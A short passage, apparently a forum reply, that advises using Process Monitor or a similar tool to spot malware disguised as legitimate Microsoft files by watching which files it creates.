Usually, the name of the process is not that obvious, they tend to mascarade it with some valid Microsoft file. The best way of finding it, is by using something like process monitor or any other process and register monitor. Re-install the original malware, and see which files is creating, this will give you a good indication on what to look at.